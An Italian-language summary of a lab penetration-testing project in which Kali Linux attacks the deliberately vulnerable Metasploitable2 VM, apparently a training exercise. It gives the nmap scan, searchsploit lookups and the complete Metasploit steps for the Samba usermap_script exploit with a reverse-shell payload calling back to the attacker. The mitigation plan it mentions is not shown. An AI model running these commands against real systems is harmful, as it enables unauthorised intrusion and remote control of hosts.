
Progetto pratico di pentest utilizzando Kali Linux vs Metasploitable2. Include flusso di lavoro completo: scansione con Nmap, enumerazione, exploit con Metasploit (Samba CVE-2007-2447), validazione post-exploit e fasi di mitigazione. Il repository contiene comandi, output e un report che mostra sia tecniche offensive che raccomandazioni difensive.
Progetto Stage 2 — Test di Penetrazione su Metasploitable2
Riepilogo: Questo progetto dimostra un flusso di lavoro completo di test di penetrazione: ricognizione, enumerazione, sfruttamento, validazione post-sfruttamento e raccomandazioni di mitigazione. Il target utilizzato è Metasploitable2 e la macchina attaccante è Kali Linux.
Strumenti: Kali Linux (attaccante) Nmap (ricognizione) Metasploit Framework (sfruttamento) SearchSploit / Exploit-DB (triage)
Passaggi eseguiti:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
Servizi identificati (esempi): vsftpd 2.3.4 (porta 21 banner), Samba smbd 3.x (porta 445).searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
Servizi abbinati a potenziali exploit (backdoor vsftpd, mappa utenti Samba).msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
Ottenuta una shell interattiva e validato il contesto utente.id uname -aRisultato Ottenuta con successo una shell remota tramite un exploit Samba, documentato il percorso di attacco e prodotto un piano di mitigazione. I log completi e gli output dei comandi sono archiviati nella cartella scans/.